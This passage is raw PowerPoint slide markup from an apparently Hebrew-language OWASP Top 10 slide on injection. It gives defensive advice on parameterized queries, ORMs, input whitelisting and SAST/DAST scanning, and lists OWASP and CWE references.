                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ארגונים עשויים לכלול כלי בדיקות קוד סטאטי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) וכלי בדיקות קוד דינאמי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) בתהליכי הפיתוח המתמשך (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CI/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) על-מנת לגלות הזרקות קוד זדוני בשלבים מוקדמים, טרם העברת הקוד לסביבות הייצור.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6363505"/>
            <a:ext cx="3383280" cy="275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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Parameterize Queries</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8"/>
              </a:rPr>
              <a:t>OWASP ASVS: V5 Input Validation and Encoding</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9"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ORM injection</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12"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention</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13"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: SQL Injection Prevention</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14"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java</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15"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization</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16"/>
              </a:rPr>
              <a:t>OWASP Automated Threats to Web Applications – OAT-014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE-77</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>: Command Injection</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Injection</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-564: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Injection</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language Injection</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>wigger: Server-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3114190"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מניעת מתקפות הזרקת קוד זדוני מחייבות הפרדת המידע עצמו מהפקודות ומהשאילתות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדרך המועדפת הינה שימוש בממשק פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מאובטח, אשר מונע את השימוש ברכיב התרגום לחלוטין או מספק ממשק מבוסס פרמטרים, או מבצע הסבה לשימוש בכלי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object Relational Mapping (ORMs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שים לב</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: גם כאשר מבצעים שימוש בפרמטרים, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stored procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עשויות לייצר מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> במידה ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PL/SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> משרשרות שאילתות ומידע, או מריצות קוד זדוני עם פקודות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE IMMEDIATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>השתמש בבדיקת קלטים חיובית או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“white-list”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בצד השרת. זו אינה הגנה מלאה מכיוון שיישומים רבים מחייבים שימוש בתווים מיוחדים, כגון אזורי טקסט או ממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
